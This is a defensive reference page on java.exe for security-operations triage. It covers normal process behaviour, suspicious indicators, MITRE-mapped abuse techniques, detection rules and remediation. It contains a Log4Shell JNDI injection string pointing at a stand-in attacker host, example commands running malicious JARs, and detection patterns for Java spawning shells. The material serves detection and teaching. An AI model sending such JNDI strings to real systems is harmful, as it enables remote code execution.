High RiskWindowsLegitimateCommonly Abused

java.exeRUNTIME ENVIRONMENT

java.exe - Java Runtime Security Analysis

java.exe is the **Java Runtime Environment** launcher, executing Java applications on Windows. Java has a **notorious security history** with many critical vulnerabilities (Log4Shell, deserilization attacks). Attackers abuse java.exe to run **malicious JAR files**, exploit **Log4j vulnerabilities**, and leverage Java's capabilities for code execution.

Risk Summary

HIGH priority for SOC triage. java.exe can execute arbitrary code via JAR files and has had numerous critical vulnerabilities. Monitor for unexpected Java executions, suspicious JAR files, Log4j exploitation attempts, and Java processes spawning shells.

What is java.exe?

java.exe is the Java application launcher that runs Java programs.

Core Functions

Java Execution:

Launches Java applications
Runs JAR files
Starts the JVM

Related Executables

Binary	Purpose
java.exe	Console Java launcher
javaw.exe	Windowless Java launcher
javaws.exe	Java Web Start (deprecated)

Security Significance

Code Execution: Runs arbitrary Java code
Vulnerability History: Log4j, deserialization
Common Target: Enterprise applications
Shell Spawning: Can execute system commands

Normal Behavior

Expected Process State

Property	Expected Value
Path	C:\Program Files\Java\jre*\bin\java.exe
Parent	Application-dependent
User	Varies by application
Network	Application-dependent

Common Legitimate Parents

eclipse.exe
Application servers
Custom business applications
Build tools (Maven, Gradle)

Installation Locations

C:\Program Files\Java\jre*\bin\
C:\Program Files\Java\jdk*\bin\
C:\Program Files (x86)\Java\*

C:\Program Files\Java\*\bin\java.exeC:\Program Files (x86)\Java\*\bin\java.exeC:\Program Files\Eclipse Adoptium\*\bin\java.exe

Legitimate vs Suspicious

LEGITIMATE

Path:        C:\Program Files\Java\*\bin\java.exe
Parent:      Known application
Command:     Running known JAR file
Network:     Expected endpoints

SUSPICIOUS

Path:        C:\Users\Public\java.exe
             C:\Temp\jre\bin\java.exe
Parent:      cmd.exe, powershell.exe, wscript.exe
Command:     -jar unknown.jar
             Suspicious JNDI strings
Children:    cmd.exe, powershell.exe
Network:     Unknown destinations

Attack Techniques

Technique #1: Log4Shell Exploitation (T1190)

JNDI Injection:

${jndi:ldap://attacker.com/exploit}

Detection Signals:

JNDI lookup in logs
Outbound LDAP connections
Java spawning shells

Technique #2: Malicious JAR Execution (T1059.005)

Running Malicious Code:

java -jar malware.jar
javaw -jar hidden-payload.jar

Technique #3: Deserilization Attacks (T1059)

Exploiting unsafe deserialization in Java applications.

Technique #4: Shell Spawning (T1059.003)

java.exe → cmd.exe / powershell.exe

Detection Strategies

Priority #1: Shell Spawning

ParentProcess = "java.exe" AND
ChildProcess IN ["cmd.exe", "powershell.exe", "bash.exe"]
→ ALERT: CRITICAL - Java spawning shell

Priority #2: Unknown JAR Files

Process = "java.exe" AND
CommandLine CONTAINS "-jar" AND
JarFile NOT IN whitelist
→ ALERT: HIGH

Priority #3: JNDI Indicators

Log CONTAINS "${jndi:" OR
Network = LDAP outbound from Java
→ ALERT: CRITICAL - Potential Log4j exploit

Priority #4: Unusual Path

Process = "java.exe" AND
Path NOT CONTAINS "Program Files"
→ ALERT: HIGH

Protection and Remediation

Defense: Patch Java

Keep Java updated to latest version.

Defense: Log4j Mitigation

-Dlog4j2.formatMsgNoLookups=true

Defense: Application Control

Whitelist known Java applications.

If Compromise Suspected

Identify the JAR file being executed
Check for shell spawning
Review network connections
Analyze logs for JNDI strings
Update/patch Java and libraries

Investigation Checklist

Verify java.exe path is legitimate
Identify JAR file being executed
Check for child shell processes
Review network connections
Search logs for JNDI strings
Check Java version for vulnerabilities
Analyze command line arguments

T1190 T1059.005 T1059.003 T1071

Last verified: January 18, 2026

java.exe - Java Runtime Security Analysis

Risk Summary

Overview

What is java.exe?

Core Functions

Related Executables

Security Significance

Normal Behavior

Normal Behavior

Expected Process State

Common Legitimate Parents

Installation Locations

Common Locations

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE

SUSPICIOUS

Abuse Techniques

Attack Techniques

Technique #1: Log4Shell Exploitation (T1190)

Technique #2: Malicious JAR Execution (T1059.005)

Technique #3: Deserilization Attacks (T1059)

Technique #4: Shell Spawning (T1059.003)

Detection Guidance

Detection Strategies

Priority #1: Shell Spawning

Priority #2: Unknown JAR Files

Priority #3: JNDI Indicators

Priority #4: Unusual Path

Remediation Steps

Protection and Remediation

Defense: Patch Java

Defense: Log4j Mitigation

Defense: Application Control

If Compromise Suspected

Investigation Checklist

Investigation Checklist

MITRE ATT&CK Techniques

Risk Summary

Overview

What is java.exe?

Core Functions

Related Executables

Security Significance

Normal Behavior

Normal Behavior

Expected Process State

Common Legitimate Parents

Installation Locations

Common Locations

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE

SUSPICIOUS

Abuse Techniques

Attack Techniques

Technique #1: Log4Shell Exploitation (T1190)

Technique #2: Malicious JAR Execution (T1059.005)

Technique #3: Deserilization Attacks (T1059)

Technique #4: Shell Spawning (T1059.003)

Detection Guidance

Detection Strategies

Priority #1: Shell Spawning

Priority #2: Unknown JAR Files

Priority #3: JNDI Indicators

Priority #4: Unusual Path

Remediation Steps

Protection and Remediation

Defense: Patch Java

Defense: Log4j Mitigation

Defense: Application Control

If Compromise Suspected

Investigation Checklist

Investigation Checklist

MITRE ATT&CK Techniques

Related Windows Files